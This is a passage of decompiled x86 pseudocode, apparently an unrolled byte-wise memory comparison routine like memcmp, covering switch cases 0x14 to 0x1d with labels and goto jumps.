                                                                                                                                      								__edx =  *(__ecx - 0x12) & 0x000000ff;
                                                                                                                                      								__esi = ( *(__eax - 0x12) & 0x000000ff) - ( *(__ecx - 0x12) & 0x000000ff);
                                                                                                                                      								if(__esi == 0) {
                                                                                                                                      									L377:
                                                                                                                                      									__esi =  *(__eax - 0x11) & 0x000000ff;
                                                                                                                                      									__edx =  *(__ecx - 0x11) & 0x000000ff;
                                                                                                                                      									__esi = ( *(__eax - 0x11) & 0x000000ff) - ( *(__ecx - 0x11) & 0x000000ff);
                                                                                                                                      									if(__esi == 0) {
                                                                                                                                      										L379:
                                                                                                                                      										__esi =  *(__eax - 0x10) & 0x000000ff;
                                                                                                                                      										__edx =  *(__ecx - 0x10) & 0x000000ff;
                                                                                                                                      										__esi = ( *(__eax - 0x10) & 0x000000ff) - ( *(__ecx - 0x10) & 0x000000ff);
                                                                                                                                      										if(__esi != 0) {
                                                                                                                                      											__edx = 0;
                                                                                                                                      											_t852 = (0 | __esi > 0x00000000) - 1; // -1
                                                                                                                                      											__esi = (__esi > 0) + _t852;
                                                                                                                                      										}
                                                                                                                                      										goto L382;
                                                                                                                                      									}
                                                                                                                                      									__edx = 0;
                                                                                                                                      									__edx = 0 | __esi > 0x00000000;
                                                                                                                                      									_t846 = __edx - 1; // -1
                                                                                                                                      									__esi = __edx + _t846;
                                                                                                                                      									if(__edx + _t846 != 0) {
                                                                                                                                      										goto L98;
                                                                                                                                      									}
                                                                                                                                      									goto L379;
                                                                                                                                      								}
                                                                                                                                      								__edx = 0;
                                                                                                                                      								__edx = 0 | __esi > 0x00000000;
                                                                                                                                      								_t840 = __edx - 1; // -1
                                                                                                                                      								__esi = __edx + _t840;
                                                                                                                                      								if(__edx + _t840 != 0) {
                                                                                                                                      									goto L98;
                                                                                                                                      								}
                                                                                                                                      								goto L377;
                                                                                                                                      							}
                                                                                                                                      							__edx = 0;
                                                                                                                                      							__edx = 0 | __esi > 0x00000000;
                                                                                                                                      							_t834 = __edx - 1; // -1
                                                                                                                                      							__esi = __edx + _t834;
                                                                                                                                      							if(__edx + _t834 != 0) {
                                                                                                                                      								goto L98;
                                                                                                                                      							}
                                                                                                                                      							goto L375;
                                                                                                                                      						case 0x14:
                                                                                                                                      							L121:
                                                                                                                                      							__edx =  *(__eax - 0x14);
                                                                                                                                      							if( *(__eax - 0x14) ==  *(__ecx - 0x14)) {
                                                                                                                                      								__esi = 0;
                                                                                                                                      								L131:
                                                                                                                                      								if(__esi != 0) {
                                                                                                                                      									goto L98;
                                                                                                                                      								}
                                                                                                                                      								goto L132;
                                                                                                                                      							}
                                                                                                                                      							__esi = __dl & 0x000000ff;
                                                                                                                                      							__edx =  *(__ecx - 0x14) & 0x000000ff;
                                                                                                                                      							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x14) & 0x000000ff);
                                                                                                                                      							if(__esi == 0) {
                                                                                                                                      								L124:
                                                                                                                                      								__esi =  *(__eax - 0x13) & 0x000000ff;
                                                                                                                                      								__edx =  *(__ecx - 0x13) & 0x000000ff;
                                                                                                                                      								__esi = ( *(__eax - 0x13) & 0x000000ff) - ( *(__ecx - 0x13) & 0x000000ff);
                                                                                                                                      								if(__esi == 0) {
                                                                                                                                      									L126:
                                                                                                                                      									__esi =  *(__eax - 0x12) & 0x000000ff;
                                                                                                                                      									__edx =  *(__ecx - 0x12) & 0x000000ff;
                                                                                                                                      									__esi = ( *(__eax - 0x12) & 0x000000ff) - ( *(__ecx - 0x12) & 0x000000ff);
                                                                                                                                      									if(__esi == 0) {
                                                                                                                                      										L128:
                                                                                                                                      										__esi =  *(__eax - 0x11) & 0x000000ff;
                                                                                                                                      										__edx =  *(__ecx - 0x11) & 0x000000ff;
                                                                                                                                      										__esi = ( *(__eax - 0x11) & 0x000000ff) - ( *(__ecx - 0x11) & 0x000000ff);
                                                                                                                                      										if(__esi != 0) {
                                                                                                                                      											__edx = 0;
                                                                                                                                      											_t284 = (0 | __esi > 0x00000000) - 1; // -1
                                                                                                                                      											__esi = (__esi > 0) + _t284;
                                                                                                                                      										}
                                                                                                                                      										goto L131;
                                                                                                                                      									}
                                                                                                                                      									__edx = 0;
                                                                                                                                      									__edx = 0 | __esi > 0x00000000;
                                                                                                                                      									_t278 = __edx - 1; // -1
                                                                                                                                      									__esi = __edx + _t278;
                                                                                                                                      									if(__edx + _t278 != 0) {
                                                                                                                                      										goto L98;
                                                                                                                                      									}
                                                                                                                                      									goto L128;
                                                                                                                                      								}
                                                                                                                                      								__edx = 0;
                                                                                                                                      								__edx = 0 | __esi > 0x00000000;
                                                                                                                                      								_t272 = __edx - 1; // -1
                                                                                                                                      								__esi = __edx + _t272;
                                                                                                                                      								if(__edx + _t272 != 0) {
                                                                                                                                      									goto L98;
                                                                                                                                      								}
                                                                                                                                      								goto L126;
                                                                                                                                      							}
                                                                                                                                      							__edx = 0;
                                                                                                                                      							__edx = 0 | __esi > 0x00000000;
                                                                                                                                      							_t266 = __edx - 1; // -1
                                                                                                                                      							__esi = __edx + _t266;
                                                                                                                                      							if(__edx + _t266 != 0) {
                                                                                                                                      								goto L98;
                                                                                                                                      							}
                                                                                                                                      							goto L124;
                                                                                                                                      						case 0x15:
                                                                                                                                      							L201:
                                                                                                                                      							__edx =  *(__eax - 0x15);
                                                                                                                                      							if( *(__eax - 0x15) ==  *(__ecx - 0x15)) {
                                                                                                                                      								__esi = 0;
                                                                                                                                      								L211:
                                                                                                                                      								if(__esi != 0) {
                                                                                                                                      									goto L98;
                                                                                                                                      								}
                                                                                                                                      								goto L212;
                                                                                                                                      							}
                                                                                                                                      							__esi = __dl & 0x000000ff;
                                                                                                                                      							__edx =  *(__ecx - 0x15) & 0x000000ff;
                                                                                                                                      							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x15) & 0x000000ff);
                                                                                                                                      							if(__esi == 0) {
                                                                                                                                      								L204:
                                                                                                                                      								__esi =  *(__eax - 0x14) & 0x000000ff;
                                                                                                                                      								__edx =  *(__ecx - 0x14) & 0x000000ff;
                                                                                                                                      								__esi = ( *(__eax - 0x14) & 0x000000ff) - ( *(__ecx - 0x14) & 0x000000ff);
                                                                                                                                      								if(__esi == 0) {
                                                                                                                                      									L206:
                                                                                                                                      									__esi =  *(__eax - 0x13) & 0x000000ff;
                                                                                                                                      									__edx =  *(__ecx - 0x13) & 0x000000ff;
                                                                                                                                      									__esi = ( *(__eax - 0x13) & 0x000000ff) - ( *(__ecx - 0x13) & 0x000000ff);
                                                                                                                                      									if(__esi == 0) {
                                                                                                                                      										L208:
                                                                                                                                      										__esi =  *(__eax - 0x12) & 0x000000ff;
                                                                                                                                      										__edx =  *(__ecx - 0x12) & 0x000000ff;
                                                                                                                                      										__esi = ( *(__eax - 0x12) & 0x000000ff) - ( *(__ecx - 0x12) & 0x000000ff);
                                                                                                                                      										if(__esi != 0) {
                                                                                                                                      											__edx = 0;
                                                                                                                                      											_t460 = (0 | __esi > 0x00000000) - 1; // -1
                                                                                                                                      											__esi = (__esi > 0) + _t460;
                                                                                                                                      										}
                                                                                                                                      										goto L211;
                                                                                                                                      									}
                                                                                                                                      									__edx = 0;
                                                                                                                                      									__edx = 0 | __esi > 0x00000000;
                                                                                                                                      									_t454 = __edx - 1; // -1
                                                                                                                                      									__esi = __edx + _t454;
                                                                                                                                      									if(__edx + _t454 != 0) {
                                                                                                                                      										goto L98;
                                                                                                                                      									}
                                                                                                                                      									goto L208;
                                                                                                                                      								}
                                                                                                                                      								__edx = 0;
                                                                                                                                      								__edx = 0 | __esi > 0x00000000;
                                                                                                                                      								_t448 = __edx - 1; // -1
                                                                                                                                      								__esi = __edx + _t448;
                                                                                                                                      								if(__edx + _t448 != 0) {
                                                                                                                                      									goto L98;
                                                                                                                                      								}
                                                                                                                                      								goto L206;
                                                                                                                                      							}
                                                                                                                                      							__edx = 0;
                                                                                                                                      							__edx = 0 | __esi > 0x00000000;
                                                                                                                                      							_t442 = __edx - 1; // -1
                                                                                                                                      							__esi = __edx + _t442;
                                                                                                                                      							if(__edx + _t442 != 0) {
                                                                                                                                      								goto L98;
                                                                                                                                      							}
                                                                                                                                      							goto L204;
                                                                                                                                      						case 0x16:
                                                                                                                                      							L280:
                                                                                                                                      							__edx =  *(__eax - 0x16);
                                                                                                                                      							if( *(__eax - 0x16) ==  *(__ecx - 0x16)) {
                                                                                                                                      								__esi = 0;
                                                                                                                                      								L290:
                                                                                                                                      								if(__esi != 0) {
                                                                                                                                      									goto L98;
                                                                                                                                      								}
                                                                                                                                      								goto L291;
                                                                                                                                      							}
                                                                                                                                      							__esi = __dl & 0x000000ff;
                                                                                                                                      							__edx =  *(__ecx - 0x16) & 0x000000ff;
                                                                                                                                      							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x16) & 0x000000ff);
                                                                                                                                      							if(__esi == 0) {
                                                                                                                                      								L283:
                                                                                                                                      								__esi =  *(__eax - 0x15) & 0x000000ff;
                                                                                                                                      								__edx =  *(__ecx - 0x15) & 0x000000ff;
                                                                                                                                      								__esi = ( *(__eax - 0x15) & 0x000000ff) - ( *(__ecx - 0x15) & 0x000000ff);
                                                                                                                                      								if(__esi == 0) {
                                                                                                                                      									L285:
                                                                                                                                      									__esi =  *(__eax - 0x14) & 0x000000ff;
                                                                                                                                      									__edx =  *(__ecx - 0x14) & 0x000000ff;
                                                                                                                                      									__esi = ( *(__eax - 0x14) & 0x000000ff) - ( *(__ecx - 0x14) & 0x000000ff);
                                                                                                                                      									if(__esi == 0) {
                                                                                                                                      										L287:
                                                                                                                                      										__esi =  *(__eax - 0x13) & 0x000000ff;
                                                                                                                                      										__edx =  *(__ecx - 0x13) & 0x000000ff;
                                                                                                                                      										__esi = ( *(__eax - 0x13) & 0x000000ff) - ( *(__ecx - 0x13) & 0x000000ff);
                                                                                                                                      										if(__esi != 0) {
                                                                                                                                      											__edx = 0;
                                                                                                                                      											_t642 = (0 | __esi > 0x00000000) - 1; // -1
                                                                                                                                      											__esi = (__esi > 0) + _t642;
                                                                                                                                      										}
                                                                                                                                      										goto L290;
                                                                                                                                      									}
                                                                                                                                      									__edx = 0;
                                                                                                                                      									__edx = 0 | __esi > 0x00000000;
                                                                                                                                      									_t636 = __edx - 1; // -1
                                                                                                                                      									__esi = __edx + _t636;
                                                                                                                                      									if(__edx + _t636 != 0) {
                                                                                                                                      										goto L98;
                                                                                                                                      									}
                                                                                                                                      									goto L287;
                                                                                                                                      								}
                                                                                                                                      								__edx = 0;
                                                                                                                                      								__edx = 0 | __esi > 0x00000000;
                                                                                                                                      								_t630 = __edx - 1; // -1
                                                                                                                                      								__esi = __edx + _t630;
                                                                                                                                      								if(__edx + _t630 != 0) {
                                                                                                                                      									goto L98;
                                                                                                                                      								}
                                                                                                                                      								goto L285;
                                                                                                                                      							}
                                                                                                                                      							__edx = 0;
                                                                                                                                      							__edx = 0 | __esi > 0x00000000;
                                                                                                                                      							_t624 = __edx - 1; // -1
                                                                                                                                      							__esi = __edx + _t624;
                                                                                                                                      							if(__edx + _t624 != 0) {
                                                                                                                                      								goto L98;
                                                                                                                                      							}
                                                                                                                                      							goto L283;
                                                                                                                                      						case 0x17:
                                                                                                                                      							L361:
                                                                                                                                      							__edx =  *(__eax - 0x17);
                                                                                                                                      							if( *(__eax - 0x17) ==  *(__ecx - 0x17)) {
                                                                                                                                      								__esi = 0;
                                                                                                                                      								L371:
                                                                                                                                      								if(__esi != 0) {
                                                                                                                                      									goto L98;
                                                                                                                                      								}
                                                                                                                                      								goto L372;
                                                                                                                                      							}
                                                                                                                                      							__esi = __dl & 0x000000ff;
                                                                                                                                      							__edx =  *(__ecx - 0x17) & 0x000000ff;
                                                                                                                                      							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x17) & 0x000000ff);
                                                                                                                                      							if(__esi == 0) {
                                                                                                                                      								L364:
                                                                                                                                      								__esi =  *(__eax - 0x16) & 0x000000ff;
                                                                                                                                      								__edx =  *(__ecx - 0x16) & 0x000000ff;
                                                                                                                                      								__esi = ( *(__eax - 0x16) & 0x000000ff) - ( *(__ecx - 0x16) & 0x000000ff);
                                                                                                                                      								if(__esi == 0) {
                                                                                                                                      									L366:
                                                                                                                                      									__esi =  *(__eax - 0x15) & 0x000000ff;
                                                                                                                                      									__edx =  *(__ecx - 0x15) & 0x000000ff;
                                                                                                                                      									__esi = ( *(__eax - 0x15) & 0x000000ff) - ( *(__ecx - 0x15) & 0x000000ff);
                                                                                                                                      									if(__esi == 0) {
                                                                                                                                      										L368:
                                                                                                                                      										__esi =  *(__eax - 0x14) & 0x000000ff;
                                                                                                                                      										__edx =  *(__ecx - 0x14) & 0x000000ff;
                                                                                                                                      										__esi = ( *(__eax - 0x14) & 0x000000ff) - ( *(__ecx - 0x14) & 0x000000ff);
                                                                                                                                      										if(__esi != 0) {
                                                                                                                                      											__edx = 0;
                                                                                                                                      											_t827 = (0 | __esi > 0x00000000) - 1; // -1
                                                                                                                                      											__esi = (__esi > 0) + _t827;
                                                                                                                                      										}
                                                                                                                                      										goto L371;
                                                                                                                                      									}
                                                                                                                                      									__edx = 0;
                                                                                                                                      									__edx = 0 | __esi > 0x00000000;
                                                                                                                                      									_t821 = __edx - 1; // -1
                                                                                                                                      									__esi = __edx + _t821;
                                                                                                                                      									if(__edx + _t821 != 0) {
                                                                                                                                      										goto L98;
                                                                                                                                      									}
                                                                                                                                      									goto L368;
                                                                                                                                      								}
                                                                                                                                      								__edx = 0;
                                                                                                                                      								__edx = 0 | __esi > 0x00000000;
                                                                                                                                      								_t815 = __edx - 1; // -1
                                                                                                                                      								__esi = __edx + _t815;
                                                                                                                                      								if(__edx + _t815 != 0) {
                                                                                                                                      									goto L98;
                                                                                                                                      								}
                                                                                                                                      								goto L366;
                                                                                                                                      							}
                                                                                                                                      							__edx = 0;
                                                                                                                                      							__edx = 0 | __esi > 0x00000000;
                                                                                                                                      							_t809 = __edx - 1; // -1
                                                                                                                                      							__esi = __edx + _t809;
                                                                                                                                      							if(__edx + _t809 != 0) {
                                                                                                                                      								goto L98;
                                                                                                                                      							}
                                                                                                                                      							goto L364;
                                                                                                                                      						case 0x18:
                                                                                                                                      							L110:
                                                                                                                                      							__edx =  *(__eax - 0x18);
                                                                                                                                      							if( *(__eax - 0x18) ==  *(__ecx - 0x18)) {
                                                                                                                                      								__esi = 0;
                                                                                                                                      								L120:
                                                                                                                                      								if(__esi != 0) {
                                                                                                                                      									goto L98;
                                                                                                                                      								}
                                                                                                                                      								goto L121;
                                                                                                                                      							}
                                                                                                                                      							__esi = __dl & 0x000000ff;
                                                                                                                                      							__edx =  *(__ecx - 0x18) & 0x000000ff;
                                                                                                                                      							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x18) & 0x000000ff);
                                                                                                                                      							if(__esi == 0) {
                                                                                                                                      								L113:
                                                                                                                                      								__esi =  *(__eax - 0x17) & 0x000000ff;
                                                                                                                                      								__edx =  *(__ecx - 0x17) & 0x000000ff;
                                                                                                                                      								__esi = ( *(__eax - 0x17) & 0x000000ff) - ( *(__ecx - 0x17) & 0x000000ff);
                                                                                                                                      								if(__esi == 0) {
                                                                                                                                      									L115:
                                                                                                                                      									__esi =  *(__eax - 0x16) & 0x000000ff;
                                                                                                                                      									__edx =  *(__ecx - 0x16) & 0x000000ff;
                                                                                                                                      									__esi = ( *(__eax - 0x16) & 0x000000ff) - ( *(__ecx - 0x16) & 0x000000ff);
                                                                                                                                      									if(__esi == 0) {
                                                                                                                                      										L117:
                                                                                                                                      										__esi =  *(__eax - 0x15) & 0x000000ff;
                                                                                                                                      										__edx =  *(__ecx - 0x15) & 0x000000ff;
                                                                                                                                      										__esi = ( *(__eax - 0x15) & 0x000000ff) - ( *(__ecx - 0x15) & 0x000000ff);
                                                                                                                                      										if(__esi != 0) {
                                                                                                                                      											__edx = 0;
                                                                                                                                      											_t259 = (0 | __esi > 0x00000000) - 1; // -1
                                                                                                                                      											__esi = (__esi > 0) + _t259;
                                                                                                                                      										}
                                                                                                                                      										goto L120;
                                                                                                                                      									}
                                                                                                                                      									__edx = 0;
                                                                                                                                      									__edx = 0 | __esi > 0x00000000;
                                                                                                                                      									_t253 = __edx - 1; // -1
                                                                                                                                      									__esi = __edx + _t253;
                                                                                                                                      									if(__edx + _t253 != 0) {
                                                                                                                                      										goto L98;
                                                                                                                                      									}
                                                                                                                                      									goto L117;
                                                                                                                                      								}
                                                                                                                                      								__edx = 0;
                                                                                                                                      								__edx = 0 | __esi > 0x00000000;
                                                                                                                                      								_t247 = __edx - 1; // -1
                                                                                                                                      								__esi = __edx + _t247;
                                                                                                                                      								if(__edx + _t247 != 0) {
                                                                                                                                      									goto L98;
                                                                                                                                      								}
                                                                                                                                      								goto L115;
                                                                                                                                      							}
                                                                                                                                      							__edx = 0;
                                                                                                                                      							__edx = 0 | __esi > 0x00000000;
                                                                                                                                      							_t241 = __edx - 1; // -1
                                                                                                                                      							__esi = __edx + _t241;
                                                                                                                                      							if(__edx + _t241 != 0) {
                                                                                                                                      								goto L98;
                                                                                                                                      							}
                                                                                                                                      							goto L113;
                                                                                                                                      						case 0x19:
                                                                                                                                      							L190:
                                                                                                                                      							__edx =  *(__eax - 0x19);
                                                                                                                                      							if( *(__eax - 0x19) ==  *(__ecx - 0x19)) {
                                                                                                                                      								__esi = 0;
                                                                                                                                      								L200:
                                                                                                                                      								if(__esi != 0) {
                                                                                                                                      									goto L98;
                                                                                                                                      								}
                                                                                                                                      								goto L201;
                                                                                                                                      							}
                                                                                                                                      							__esi = __dl & 0x000000ff;
                                                                                                                                      							__edx =  *(__ecx - 0x19) & 0x000000ff;
                                                                                                                                      							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x19) & 0x000000ff);
                                                                                                                                      							if(__esi == 0) {
                                                                                                                                      								L193:
                                                                                                                                      								__esi =  *(__eax - 0x18) & 0x000000ff;
                                                                                                                                      								__edx =  *(__ecx - 0x18) & 0x000000ff;
                                                                                                                                      								__esi = ( *(__eax - 0x18) & 0x000000ff) - ( *(__ecx - 0x18) & 0x000000ff);
                                                                                                                                      								if(__esi == 0) {
                                                                                                                                      									L195:
                                                                                                                                      									__esi =  *(__eax - 0x17) & 0x000000ff;
                                                                                                                                      									__edx =  *(__ecx - 0x17) & 0x000000ff;
                                                                                                                                      									__esi = ( *(__eax - 0x17) & 0x000000ff) - ( *(__ecx - 0x17) & 0x000000ff);
                                                                                                                                      									if(__esi == 0) {
                                                                                                                                      										L197:
                                                                                                                                      										__esi =  *(__eax - 0x16) & 0x000000ff;
                                                                                                                                      										__edx =  *(__ecx - 0x16) & 0x000000ff;
                                                                                                                                      										__esi = ( *(__eax - 0x16) & 0x000000ff) - ( *(__ecx - 0x16) & 0x000000ff);
                                                                                                                                      										if(__esi != 0) {
                                                                                                                                      											__edx = 0;
                                                                                                                                      											_t435 = (0 | __esi > 0x00000000) - 1; // -1
                                                                                                                                      											__esi = (__esi > 0) + _t435;
                                                                                                                                      										}
                                                                                                                                      										goto L200;
                                                                                                                                      									}
                                                                                                                                      									__edx = 0;
                                                                                                                                      									__edx = 0 | __esi > 0x00000000;
                                                                                                                                      									_t429 = __edx - 1; // -1
                                                                                                                                      									__esi = __edx + _t429;
                                                                                                                                      									if(__edx + _t429 != 0) {
                                                                                                                                      										goto L98;
                                                                                                                                      									}
                                                                                                                                      									goto L197;
                                                                                                                                      								}
                                                                                                                                      								__edx = 0;
                                                                                                                                      								__edx = 0 | __esi > 0x00000000;
                                                                                                                                      								_t423 = __edx - 1; // -1
                                                                                                                                      								__esi = __edx + _t423;
                                                                                                                                      								if(__edx + _t423 != 0) {
                                                                                                                                      									goto L98;
                                                                                                                                      								}
                                                                                                                                      								goto L195;
                                                                                                                                      							}
                                                                                                                                      							__edx = 0;
                                                                                                                                      							__edx = 0 | __esi > 0x00000000;
                                                                                                                                      							_t417 = __edx - 1; // -1
                                                                                                                                      							__esi = __edx + _t417;
                                                                                                                                      							if(__edx + _t417 != 0) {
                                                                                                                                      								goto L98;
                                                                                                                                      							}
                                                                                                                                      							goto L193;
                                                                                                                                      						case 0x1a:
                                                                                                                                      							L269:
                                                                                                                                      							__edx =  *(__eax - 0x1a);
                                                                                                                                      							if( *(__eax - 0x1a) ==  *(__ecx - 0x1a)) {
                                                                                                                                      								__esi = 0;
                                                                                                                                      								L279:
                                                                                                                                      								if(__esi != 0) {
                                                                                                                                      									goto L98;
                                                                                                                                      								}
                                                                                                                                      								goto L280;
                                                                                                                                      							}
                                                                                                                                      							__esi = __dl & 0x000000ff;
                                                                                                                                      							__edx =  *(__ecx - 0x1a) & 0x000000ff;
                                                                                                                                      							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
                                                                                                                                      							if(__esi == 0) {
                                                                                                                                      								L272:
                                                                                                                                      								__esi =  *(__eax - 0x19) & 0x000000ff;
                                                                                                                                      								__edx =  *(__ecx - 0x19) & 0x000000ff;
                                                                                                                                      								__esi = ( *(__eax - 0x19) & 0x000000ff) - ( *(__ecx - 0x19) & 0x000000ff);
                                                                                                                                      								if(__esi == 0) {
                                                                                                                                      									L274:
                                                                                                                                      									__esi =  *(__eax - 0x18) & 0x000000ff;
                                                                                                                                      									__edx =  *(__ecx - 0x18) & 0x000000ff;
                                                                                                                                      									__esi = ( *(__eax - 0x18) & 0x000000ff) - ( *(__ecx - 0x18) & 0x000000ff);
                                                                                                                                      									if(__esi == 0) {
                                                                                                                                      										L276:
                                                                                                                                      										__esi =  *(__eax - 0x17) & 0x000000ff;
                                                                                                                                      										__edx =  *(__ecx - 0x17) & 0x000000ff;
                                                                                                                                      										__esi = ( *(__eax - 0x17) & 0x000000ff) - ( *(__ecx - 0x17) & 0x000000ff);
                                                                                                                                      										if(__esi != 0) {
                                                                                                                                      											__edx = 0;
                                                                                                                                      											_t617 = (0 | __esi > 0x00000000) - 1; // -1
                                                                                                                                      											__esi = (__esi > 0) + _t617;
                                                                                                                                      										}
                                                                                                                                      										goto L279;
                                                                                                                                      									}
                                                                                                                                      									__edx = 0;
                                                                                                                                      									__edx = 0 | __esi > 0x00000000;
                                                                                                                                      									_t611 = __edx - 1; // -1
                                                                                                                                      									__esi = __edx + _t611;
                                                                                                                                      									if(__edx + _t611 != 0) {
                                                                                                                                      										goto L98;
                                                                                                                                      									}
                                                                                                                                      									goto L276;
                                                                                                                                      								}
                                                                                                                                      								__edx = 0;
                                                                                                                                      								__edx = 0 | __esi > 0x00000000;
                                                                                                                                      								_t605 = __edx - 1; // -1
                                                                                                                                      								__esi = __edx + _t605;
                                                                                                                                      								if(__edx + _t605 != 0) {
                                                                                                                                      									goto L98;
                                                                                                                                      								}
                                                                                                                                      								goto L274;
                                                                                                                                      							}
                                                                                                                                      							__edx = 0;
                                                                                                                                      							__edx = 0 | __esi > 0x00000000;
                                                                                                                                      							_t599 = __edx - 1; // -1
                                                                                                                                      							__esi = __edx + _t599;
                                                                                                                                      							if(__edx + _t599 != 0) {
                                                                                                                                      								goto L98;
                                                                                                                                      							}
                                                                                                                                      							goto L272;
                                                                                                                                      						case 0x1b:
                                                                                                                                      							L350:
                                                                                                                                      							__edx =  *(__eax - 0x1b);
                                                                                                                                      							if( *(__eax - 0x1b) ==  *(__ecx - 0x1b)) {
                                                                                                                                      								__esi = 0;
                                                                                                                                      								L360:
                                                                                                                                      								if(__esi != 0) {
                                                                                                                                      									goto L98;
                                                                                                                                      								}
                                                                                                                                      								goto L361;
                                                                                                                                      							}
                                                                                                                                      							__esi = __dl & 0x000000ff;
                                                                                                                                      							__edx =  *(__ecx - 0x1b) & 0x000000ff;
                                                                                                                                      							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
                                                                                                                                      							if(__esi == 0) {
                                                                                                                                      								L353:
                                                                                                                                      								__esi =  *(__eax - 0x1a) & 0x000000ff;
                                                                                                                                      								__edx =  *(__ecx - 0x1a) & 0x000000ff;
                                                                                                                                      								__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
                                                                                                                                      								if(__esi == 0) {
                                                                                                                                      									L355:
                                                                                                                                      									__esi =  *(__eax - 0x19) & 0x000000ff;
                                                                                                                                      									__edx =  *(__ecx - 0x19) & 0x000000ff;
                                                                                                                                      									__esi = ( *(__eax - 0x19) & 0x000000ff) - ( *(__ecx - 0x19) & 0x000000ff);
                                                                                                                                      									if(__esi == 0) {
                                                                                                                                      										L357:
                                                                                                                                      										__esi =  *(__eax - 0x18) & 0x000000ff;
                                                                                                                                      										__edx =  *(__ecx - 0x18) & 0x000000ff;
                                                                                                                                      										__esi = ( *(__eax - 0x18) & 0x000000ff) - ( *(__ecx - 0x18) & 0x000000ff);
                                                                                                                                      										if(__esi != 0) {
                                                                                                                                      											__edx = 0;
                                                                                                                                      											_t802 = (0 | __esi > 0x00000000) - 1; // -1
                                                                                                                                      											__esi = (__esi > 0) + _t802;
                                                                                                                                      										}
                                                                                                                                      										goto L360;
                                                                                                                                      									}
                                                                                                                                      									__edx = 0;
                                                                                                                                      									__edx = 0 | __esi > 0x00000000;
                                                                                                                                      									_t796 = __edx - 1; // -1
                                                                                                                                      									__esi = __edx + _t796;
                                                                                                                                      									if(__edx + _t796 != 0) {
                                                                                                                                      										goto L98;
                                                                                                                                      									}
                                                                                                                                      									goto L357;
                                                                                                                                      								}
                                                                                                                                      								__edx = 0;
                                                                                                                                      								__edx = 0 | __esi > 0x00000000;
                                                                                                                                      								_t790 = __edx - 1; // -1
                                                                                                                                      								__esi = __edx + _t790;
                                                                                                                                      								if(__edx + _t790 != 0) {
                                                                                                                                      									goto L98;
                                                                                                                                      								}
                                                                                                                                      								goto L355;
                                                                                                                                      							}
                                                                                                                                      							__edx = 0;
                                                                                                                                      							__edx = 0 | __esi > 0x00000000;
                                                                                                                                      							_t784 = __edx - 1; // -1
                                                                                                                                      							__esi = __edx + _t784;
                                                                                                                                      							if(__edx + _t784 != 0) {
                                                                                                                                      								goto L98;
                                                                                                                                      							}
                                                                                                                                      							goto L353;
                                                                                                                                      						case 0x1c:
                                                                                                                                      							__edx =  *(__eax - 0x1c);
                                                                                                                                      							if( *(__eax - 0x1c) ==  *(__ecx - 0x1c)) {
                                                                                                                                      								__esi = 0;
                                                                                                                                      								L109:
                                                                                                                                      								if(__esi != 0) {
                                                                                                                                      									goto L98;
                                                                                                                                      								}
                                                                                                                                      								goto L110;
                                                                                                                                      							}
                                                                                                                                      							__esi = __dl & 0x000000ff;
                                                                                                                                      							__edx =  *(__ecx - 0x1c) & 0x000000ff;
                                                                                                                                      							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
                                                                                                                                      							if(__esi == 0) {
                                                                                                                                      								L102:
                                                                                                                                      								__esi =  *(__eax - 0x1b) & 0x000000ff;
                                                                                                                                      								__edx =  *(__ecx - 0x1b) & 0x000000ff;
                                                                                                                                      								__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
                                                                                                                                      								if(__esi == 0) {
                                                                                                                                      									L104:
                                                                                                                                      									__esi =  *(__eax - 0x1a) & 0x000000ff;
                                                                                                                                      									__edx =  *(__ecx - 0x1a) & 0x000000ff;
                                                                                                                                      									__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
                                                                                                                                      									if(__esi == 0) {
                                                                                                                                      										L106:
                                                                                                                                      										__esi =  *(__eax - 0x19) & 0x000000ff;
                                                                                                                                      										__edx =  *(__ecx - 0x19) & 0x000000ff;
                                                                                                                                      										__esi = ( *(__eax - 0x19) & 0x000000ff) - ( *(__ecx - 0x19) & 0x000000ff);
                                                                                                                                      										if(__esi != 0) {
                                                                                                                                      											__edx = 0;
                                                                                                                                      											_t234 = (0 | __esi > 0x00000000) - 1; // -1
                                                                                                                                      											__esi = (__esi > 0) + _t234;
                                                                                                                                      										}
                                                                                                                                      										goto L109;
                                                                                                                                      									}
                                                                                                                                      									__edx = 0;
                                                                                                                                      									__edx = 0 | __esi > 0x00000000;
                                                                                                                                      									_t228 = __edx - 1; // -1
                                                                                                                                      									__esi = __edx + _t228;
                                                                                                                                      									if(__edx + _t228 != 0) {
                                                                                                                                      										goto L98;
                                                                                                                                      									}
                                                                                                                                      									goto L106;
                                                                                                                                      								}
                                                                                                                                      								__edx = 0;
                                                                                                                                      								__edx = 0 | __esi > 0x00000000;
                                                                                                                                      								_t222 = __edx - 1; // -1
                                                                                                                                      								__esi = __edx + _t222;
                                                                                                                                      								if(__edx + _t222 != 0) {
                                                                                                                                      									goto L98;
                                                                                                                                      								}
                                                                                                                                      								goto L104;
                                                                                                                                      							}
                                                                                                                                      							__edx = 0;
                                                                                                                                      							__edx = 0 | __esi > 0x00000000;
                                                                                                                                      							_t216 = __edx - 1; // -1
                                                                                                                                      							__esi = __edx + _t216;
                                                                                                                                      							if(__edx + _t216 != 0) {
                                                                                                                                      								goto L98;
                                                                                                                                      							}
                                                                                                                                      							goto L102;
                                                                                                                                      						case 0x1d:
                                                                                                                                      							__edx =  *(__eax - 0x1d);
                                                                                                                                      							if( *(__eax - 0x1d) ==  *(__ecx - 0x1d)) {
                                                                                                                                      								__esi = 0;
                                                                                                                                      								L189:
                                                                                                                                      								if(__esi != 0) {
                                                                                                                                      									goto L98;
                                                                                                                                      								}
                                                                                                                                      								goto L190;
                                                                                                                                      							}
                                                                                                                                      							__esi = __dl & 0x000000ff;
                                                                                                                                      							__edx =  *(__ecx - 0x1d) & 0x000000ff;
                                                                                                                                      							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
                                                                                                                                      							if(__esi == 0) {
                                                                                                                                      								L182:
